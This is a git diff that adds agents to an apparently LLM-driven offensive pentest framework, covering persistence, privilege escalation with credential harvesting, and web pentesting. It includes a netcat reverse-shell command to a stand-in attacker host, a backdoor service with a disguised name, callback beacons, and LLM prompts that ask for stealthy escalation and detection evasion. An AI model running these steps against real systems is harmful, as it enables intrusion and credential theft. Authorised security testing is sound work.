"status": "simulated"
|
||||
})
|
||||
|
||||
# Service installation
|
||||
mechanisms.append({
|
||||
"type": "service",
|
||||
"description": "Windows service persistence",
|
||||
"service_name": "WindowsSecurityUpdate",
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
return mechanisms
|
||||
|
||||
def _install_backdoors(self, os_type: str) -> List[Dict]:
|
||||
"""Install backdoors"""
|
||||
backdoors = []
|
||||
|
||||
if os_type == "linux":
|
||||
backdoors.extend([
|
||||
{
|
||||
"type": "reverse_shell",
|
||||
"description": "Netcat reverse shell",
|
||||
"command": "nc -e /bin/bash attacker_ip 4444",
|
||||
"status": "simulated"
|
||||
},
|
||||
{
|
||||
"type": "ssh_backdoor",
|
||||
"description": "SSH backdoor on alternate port",
|
||||
"port": 2222,
|
||||
"status": "simulated"
|
||||
}
|
||||
])
|
||||
elif os_type == "windows":
|
||||
backdoors.extend([
|
||||
{
|
||||
"type": "powershell_backdoor",
|
||||
"description": "PowerShell reverse shell",
|
||||
"status": "simulated"
|
||||
},
|
||||
{
|
||||
"type": "meterpreter",
|
||||
"description": "Meterpreter payload",
|
||||
"status": "simulated"
|
||||
}
|
||||
])
|
||||
|
||||
return backdoors
|
||||
|
||||
def _create_scheduled_tasks(self, os_type: str) -> List[Dict]:
|
||||
"""Create scheduled tasks"""
|
||||
tasks = []
|
||||
|
||||
if os_type == "linux":
|
||||
tasks.append({
|
||||
"type": "cron",
|
||||
"schedule": "*/10 * * * *",
|
||||
"command": "Callback beacon every 10 minutes",
|
||||
"status": "simulated"
|
||||
})
|
||||
elif os_type == "windows":
|
||||
tasks.append({
|
||||
"type": "scheduled_task",
|
||||
"schedule": "Daily at 2 AM",
|
||||
"command": "Callback beacon",
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
return tasks
|
||||
305
agents/privesc_agent.py
Normal file
305
agents/privesc_agent.py
Normal file
@@ -0,0 +1,305 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Privilege Escalation Agent - System privilege elevation
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
from core.llm_manager import LLMManager
|
||||
from tools.privesc import (
|
||||
LinuxPrivEsc,
|
||||
WindowsPrivEsc,
|
||||
KernelExploiter,
|
||||
MisconfigFinder,
|
||||
CredentialHarvester,
|
||||
SudoExploiter
|
||||
)
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class PrivEscAgent:
|
||||
"""Agent responsible for privilege escalation"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
"""Initialize privilege escalation agent"""
|
||||
self.config = config
|
||||
self.llm = LLMManager(config)
|
||||
self.linux_privesc = LinuxPrivEsc(config)
|
||||
self.windows_privesc = WindowsPrivEsc(config)
|
||||
self.kernel_exploiter = KernelExploiter(config)
|
||||
self.misconfig_finder = MisconfigFinder(config)
|
||||
self.cred_harvester = CredentialHarvester(config)
|
||||
self.sudo_exploiter = SudoExploiter(config)
|
||||
|
||||
logger.info("PrivEscAgent initialized")
|
||||
|
||||
def execute(self, target: str, context: Dict) -> Dict:
|
||||
"""Execute privilege escalation phase"""
|
||||
logger.info(f"Starting privilege escalation on {target}")
|
||||
|
||||
results = {
|
||||
"target": target,
|
||||
"status": "running",
|
||||
"escalation_paths": [],
|
||||
"successful_escalations": [],
|
||||
"credentials_harvested": [],
|
||||
"system_info": {},
|
||||
"ai_analysis": {}
|
||||
}
|
||||
|
||||
try:
|
||||
# Get exploitation data from context
|
||||
exploit_data = context.get("phases", {}).get("exploitation", {})
|
||||
|
||||
if not exploit_data.get("successful_exploits"):
|
||||
logger.warning("No successful exploits found. Limited privilege escalation options.")
|
||||
results["status"] = "skipped"
|
||||
results["message"] = "No initial access obtained"
|
||||
return results
|
||||
|
||||
# Phase 1: System Enumeration
|
||||
logger.info("Phase 1: System enumeration")
|
||||
results["system_info"] = self._enumerate_system(exploit_data)
|
||||
|
||||
# Phase 2: Identify Escalation Paths
|
||||
logger.info("Phase 2: Identifying escalation paths")
|
||||
results["escalation_paths"] = self._identify_escalation_paths(
|
||||
results["system_info"]
|
||||
)
|
||||
|
||||
# Phase 3: AI-Powered Path Selection
|
||||
logger.info("Phase 3: AI escalation strategy")
|
||||
strategy = self._ai_escalation_strategy(
|
||||
results["system_info"],
|
||||
results["escalation_paths"]
|
||||
)
|
||||
results["ai_analysis"] = strategy
|
||||
|
||||
# Phase 4: Execute Escalation Attempts
|
||||
logger.info("Phase 4: Executing escalation attempts")
|
||||
for path in results["escalation_paths"][:5]:
|
||||
escalation_result = self._attempt_escalation(path, results["system_info"])
|
||||
|
||||
if escalation_result.get("success"):
|
||||
results["successful_escalations"].append(escalation_result)
|
||||
logger.info(f"Successful escalation: {path.get('technique')}")
|
||||
break # Stop after first successful escalation
|
||||
|
||||
# Phase 5: Credential Harvesting
|
||||
if results["successful_escalations"]:
|
||||
logger.info("Phase 5: Harvesting credentials")
|
||||
results["credentials_harvested"] = self._harvest_credentials(
|
||||
results["system_info"]
|
||||
)
|
||||
|
||||
results["status"] = "completed"
|
||||
logger.info("Privilege escalation phase completed")
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Error during privilege escalation: {e}")
|
||||
results["status"] = "error"
|
||||
results["error"] = str(e)
|
||||
|
||||
return results
|
||||
|
||||
def _enumerate_system(self, exploit_data: Dict) -> Dict:
|
||||
"""Enumerate system for privilege escalation opportunities"""
|
||||
system_info = {
|
||||
"os": "unknown",
|
||||
"kernel_version": "unknown",
|
||||
"architecture": "unknown",
|
||||
"users": [],
|
||||
"groups": [],
|
||||
"sudo_permissions": [],
|
||||
"suid_binaries": [],
|
||||
"writable_paths": [],
|
||||
"scheduled_tasks": [],
|
||||
"services": [],
|
||||
"environment_variables": {}
|
||||
}
|
||||
|
||||
# Determine OS type from exploit data
|
||||
os_type = self._detect_os_type(exploit_data)
|
||||
system_info["os"] = os_type
|
||||
|
||||
if os_type == "linux":
|
||||
system_info.update(self.linux_privesc.enumerate())
|
||||
elif os_type == "windows":
|
||||
system_info.update(self.windows_privesc.enumerate())
|
||||
|
||||
return system_info
|
||||
|
||||
def _detect_os_type(self, exploit_data: Dict) -> str:
|
||||
"""Detect operating system type"""
|
||||
# Placeholder - would analyze exploit data to determine OS
|
||||
return "linux" # Default assumption
|
||||
|
||||
def _identify_escalation_paths(self, system_info: Dict) -> List[Dict]:
|
||||
"""Identify possible privilege escalation paths"""
|
||||
paths = []
|
||||
os_type = system_info.get("os")
|
||||
|
||||
if os_type == "linux":
|
||||
# SUID exploitation
|
||||
for binary in system_info.get("suid_binaries", []):
|
||||
paths.append({
|
||||
"technique": "suid_exploitation",
|
||||
"target": binary,
|
||||
"difficulty": "medium",
|
||||
"likelihood": 0.6
|
||||
})
|
||||
|
||||
# Sudo exploitation
|
||||
for permission in system_info.get("sudo_permissions", []):
|
||||
paths.append({
|
||||
"technique": "sudo_exploitation",
|
||||
"target": permission,
|
||||
"difficulty": "low",
|
||||
"likelihood": 0.8
|
||||
})
|
||||
|
||||
# Kernel exploitation
|
||||
if system_info.get("kernel_version"):
|
||||
paths.append({
|
||||
"technique": "kernel_exploit",
|
||||
"target": system_info["kernel_version"],
|
||||
"difficulty": "high",
|
||||
"likelihood": 0.4
|
||||
})
|
||||
|
||||
# Writable path exploitation
|
||||
for path in system_info.get("writable_paths", []):
|
||||
if "bin" in path or "sbin" in path:
|
||||
paths.append({
|
||||
"technique": "path_hijacking",
|
||||
"target": path,
|
||||
"difficulty": "medium",
|
||||
"likelihood": 0.5
|
||||
})
|
||||
|
||||
elif os_type == "windows":
|
||||
# Service exploitation
|
||||
for service in system_info.get("services", []):
|
||||
if service.get("unquoted_path") or service.get("weak_permissions"):
|
||||
paths.append({
|
||||
"technique": "service_exploitation",
|
||||
"target": service,
|
||||
"difficulty": "medium",
|
||||
"likelihood": 0.7
|
||||
})
|
||||
|
||||
# AlwaysInstallElevated
|
||||
if system_info.get("always_install_elevated"):
|
||||
paths.append({
|
||||
"technique": "always_install_elevated",
|
||||
"target": "MSI",
|
||||
"difficulty": "low",
|
||||
"likelihood": 0.9
|
||||
})
|
||||
|
||||
# Token impersonation
|
||||
paths.append({
|
||||
"technique": "token_impersonation",
|
||||
"target": "SeImpersonatePrivilege",
|
||||
"difficulty": "medium",
|
||||
"likelihood": 0.6
|
||||
})
|
||||
|
||||
# Sort by likelihood
|
||||
paths.sort(key=lambda x: x.get("likelihood", 0), reverse=True)
|
||||
return paths
|
||||
|
||||
def _ai_escalation_strategy(self, system_info: Dict, escalation_paths: List[Dict]) -> Dict:
|
||||
"""Use AI to optimize escalation strategy"""
|
||||
prompt = self.llm.get_prompt(
|
||||
"privesc",
|
||||
"ai_escalation_strategy_user",
|
||||
default=f"""
|
||||
Analyze the system and recommend optimal privilege escalation strategy:
|
||||
|
||||
System Information:
|
||||
{json.dumps(system_info, indent=2)}
|
||||
|
||||
Identified Escalation Paths:
|
||||
{json.dumps(escalation_paths, indent=2)}
|
||||
|
||||
Provide:
|
||||
1. Recommended escalation path (with justification)
|
||||
2. Step-by-step execution plan
|
||||
3. Required tools and commands
|
||||
4. Detection likelihood and evasion techniques
|
||||
5. Fallback options
|
||||
6. Post-escalation actions
|
||||
|
||||
Response in JSON format with actionable recommendations.
|
||||
"""
|
||||
)
|
||||
|
||||
system_prompt = self.llm.get_prompt(
|
||||
"privesc",
|
||||
"ai_escalation_strategy_system",
|
||||
default="""You are an expert in privilege escalation techniques.
|
||||
Analyze systems and recommend the most effective, stealthy escalation paths.
|
||||
Consider Windows, Linux, and Active Directory environments.
|
||||
Prioritize reliability and minimal detection."""
|
||||
)
|
||||
|
||||
try:
|
||||
formatted_prompt = prompt.format(
|
||||
system_info_json=json.dumps(system_info, indent=2),
|
||||
escalation_paths_json=json.dumps(escalation_paths, indent=2)
|
||||
)
|
||||
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||
return json.loads(response)
|
||||
except Exception as e:
|
||||
logger.error(f"AI escalation strategy error: {e}")
|
||||
return {"error": str(e)}
|
||||
|
||||
def _attempt_escalation(self, path: Dict, system_info: Dict) -> Dict:
|
||||
"""Attempt privilege escalation using specified path"""
|
||||
technique = path.get("technique")
|
||||
os_type = system_info.get("os")
|
||||
|
||||
result = {
|
||||
"technique": technique,
|
||||
"success": False,
|
||||
"details": {}
|
||||
}
|
||||
|
||||
try:
|
||||
if os_type == "linux":
|
||||
if technique == "suid_exploitation":
|
||||
result = self.linux_privesc.exploit_suid(path.get("target"))
|
||||
elif technique == "sudo_exploitation":
|
||||
result = self.sudo_exploiter.exploit(path.get("target"))
|
||||
elif technique == "kernel_exploit":
|
||||
result = self.kernel_exploiter.exploit_linux(path.get("target"))
|
||||
elif technique == "path_hijacking":
|
||||
result = self.linux_privesc.exploit_path_hijacking(path.get("target"))
|
||||
|
||||
elif os_type == "windows":
|
||||
if technique == "service_exploitation":
|
||||
result = self.windows_privesc.exploit_service(path.get("target"))
|
||||
elif technique == "always_install_elevated":
|
||||
result = self.windows_privesc.exploit_msi()
|
||||
elif technique == "token_impersonation":
|
||||
result = self.windows_privesc.impersonate_token()
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Escalation error for {technique}: {e}")
|
||||
result["error"] = str(e)
|
||||
|
||||
return result
|
||||
|
||||
def _harvest_credentials(self, system_info: Dict) -> List[Dict]:
|
||||
"""Harvest credentials after privilege escalation"""
|
||||
os_type = system_info.get("os")
|
||||
|
||||
if os_type == "linux":
|
||||
return self.cred_harvester.harvest_linux()
|
||||
elif os_type == "windows":
|
||||
return self.cred_harvester.harvest_windows()
|
||||
|
||||
return []
|
||||
120
agents/web_pentest_agent.py
Normal file
120
agents/web_pentest_agent.py
Normal file
@@ -0,0 +1,120 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Web Pentest Agent - Specialized agent for web application penetration testing.
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
from core.llm_manager import LLMManager
|
||||
from tools.web_pentest import WebRecon # Import the moved WebRecon tool
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class WebPentestAgent:
|
||||
"""Agent responsible for comprehensive web application penetration testing."""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
"""Initializes the WebPentestAgent."""
|
||||
self.config = config
|
||||
self.llm = LLMManager(config)
|
||||
self.web_recon = WebRecon(config)
|
||||
# Placeholder for web exploitation tools if they become separate classes
|
||||
# self.web_exploiter = WebExploiter(config)
|
||||
logger.info("WebPentestAgent initialized")
|
||||
|
||||
def execute(self, target: str, context: Dict) -> Dict:
|
||||
"""Executes the web application penetration testing phase."""
|
||||
logger.info(f"Starting web pentest on {target}")
|
||||
|
||||
results = {
|
||||
"target": target,
|
||||
"status": "running",
|
||||
"web_recon_results": {},
|
||||
"vulnerability_analysis": [],
|
||||
"exploitation_attempts": [],
|
||||
"ai_analysis": {}
|
||||
}
|
||||
|
||||
try:
|
||||
# Phase 1: Web Reconnaissance
|
||||
logger.info("Phase 1: Web Reconnaissance (WebPentestAgent)")
|
||||
web_recon_output = self.web_recon.analyze(target)
|
||||
results["web_recon_results"] = web_recon_output
|
||||
|
||||
# Phase 2: Vulnerability Analysis (AI-powered)
|
||||
logger.info("Phase 2: AI-powered Vulnerability Analysis")
|
||||
# This part will be improved later with more detailed vulnerability detection in WebRecon
|
||||
# For now, it will look for findings reported by WebRecon
|
||||
|
||||
potential_vulnerabilities = self._identify_potential_web_vulnerabilities(web_recon_output)
|
||||
|
||||
if potential_vulnerabilities:
|
||||
results["vulnerability_analysis"] = potential_vulnerabilities
|
||||
ai_vulnerability_analysis = self._ai_analyze_web_vulnerabilities(potential_vulnerabilities, target)
|
||||
results["ai_analysis"]["vulnerability_insights"] = ai_vulnerability_analysis
|
||||
else:
|
||||
logger.info("No immediate web vulnerabilities identified by WebRecon.")
|
||||
|
||||
# Phase 3: Web Exploitation (Placeholder for now)
|
||||
# This will integrate with exploitation tools later.
|
||||
|
||||
results["status"] = "completed"
|
||||
logger.info("Web pentest phase completed")
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Error during web pentest: {e}")
|
||||
results["status"] = "error"
|
||||
results["error"] = str(e)
|
||||
|
||||
return results
|
||||
|
||||
def _identify_potential_web_vulnerabilities(self, web_recon_output: Dict) -> List[Dict]:
|
||||
"""
|
||||
Identifies potential web vulnerabilities based on WebRecon output.
|
||||
This is a placeholder and will be enhanced as WebRecon improves.
|
||||
"""
|
||||
vulnerabilities = []
|
||||
if "vulnerabilities" in web_recon_output:
|
||||
vulnerabilities.extend(web_recon_output["vulnerabilities"])
|
||||
return vulnerabilities
|
||||
|
||||
def _ai_analyze_web_vulnerabilities(self, vulnerabilities: List[Dict], target: str) -> Dict:
|
||||
"""Uses AI to analyze identified web vulnerabilities."""
|
||||
prompt = self.llm.get_prompt(
|
||||
"web_recon",
|
||||
"ai_analysis_user",
|
||||
default=f"""
|
||||
Analyze the following potential web vulnerabilities identified on {target} and provide insights:
|
||||
|
||||
Vulnerabilities: {json.dumps(vulnerabilities, indent=2)}
|
||||
|
||||
Provide:
|
||||
1. Prioritized list of vulnerabilities
|
||||
2. Recommended exploitation steps for each (if applicable)
|
||||
3. Potential impact
|
||||
4. Remediation suggestions
|
||||
|
||||
Response in JSON format with actionable recommendations.
|
||||
"""
|
||||
)
|
||||
|
||||
system_prompt = self.llm.get_prompt(
|
||||
"web_recon",
|
||||
"ai_analysis_system",
|
||||
default="""You are an expert web penetration tester and security analyst.
|
||||
Provide precise analysis of web vulnerabilities and practical advice for exploitation and remediation."""
|
||||
)
|
||||
|
||||
try:
|
||||
# Format the user prompt with recon_data
|
||||
formatted_prompt = prompt.format(
|
||||
target=target,
|
||||
vulnerabilities_json=json.dumps(vulnerabilities, indent=2)
|
||||
)
|
||||
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||
return json.loads(response)
|
||||
except Exception as e:
|
||||
logger.error(f"AI web vulnerability analysis error: {e}")
|
||||
return {"error": str(e), "raw_response": response if 'response' in locals() else None}
|
||||
|
||||
Reference in New Issue
Block a user